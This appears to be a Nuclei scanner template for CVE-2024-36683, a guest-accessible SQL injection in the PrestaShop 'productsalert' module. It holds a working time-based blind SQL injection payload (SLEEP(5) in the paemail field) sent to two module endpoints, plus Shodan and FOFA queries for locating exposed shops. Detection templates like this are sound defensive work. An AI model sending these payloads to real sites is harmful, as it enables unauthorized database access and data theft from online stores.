72 lines
2.4 KiB
YAML
72 lines
2.4 KiB
YAML
id: CVE-2024-36683
|
|
|
|
info:
|
|
name: PrestaShop productsalert - SQL Injection
|
|
author: mastercho
|
|
severity: critical
|
|
description: |
|
|
In the module 'Products Alert' (productsalert) up to version 1.7.4 from Smart Modules for PrestaShop, a guest can perform SQL injection in affected versions.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
|
|
reference:
|
|
- https://security.friendsofpresta.org/modules/2024/06/20/productsalert.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-36683
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2024-36683
|
|
cwe-id: CWE-89
|
|
epss-score: 0.04685
|
|
epss-percentile: 0.91818
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
framework: prestashop
|
|
shodan-query: html:"/productsalert"
|
|
fofa-query: body="/productsalert"
|
|
tags: cve,cve2023,prestashop,sqli,productsalert
|
|
|
|
flow: http(1) && http(2)
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
host-redirects: true
|
|
max-redirects: 3
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code == 200'
|
|
- 'contains_any(tolower(body), "productsalert", "prestashop")'
|
|
condition: and
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
@timeout: 30s
|
|
POST /modules/productsalert/pasubmit.php?submitpa&redirect_to=https://{{Hostname}}&type=2 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
cid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(5)))IuFA) AND 'pAlk'='pAlk&pasubmit=Crea%20un%20nuovo%20messaggio%20di%20notifica&pid=13158
|
|
|
|
- |
|
|
@timeout: 30s
|
|
POST /module/productsalert/AjaxProcess HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
cid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(5)))IuFA) AND 'pAlk'='pAlk&pid=13158
|
|
|
|
stop-at-first-match: true
|
|
host-redirects: true
|
|
matchers:
|
|
- type: dsl
|
|
name: time-based
|
|
dsl:
|
|
- 'duration_1>=5'
|
|
- 'duration_2>=5'
|
|
# digest: 4a0a004730450221008e6bc1bc642b3a79587c44e4a31c1a530b60d0b7395e2755678a7cd5cd1f38dd0220795fdc5c15b332216c86acfdd9935111a8e55cfce94497a6b485e09ceaa42308:922c64590222798bb761d5b6d8e72950 |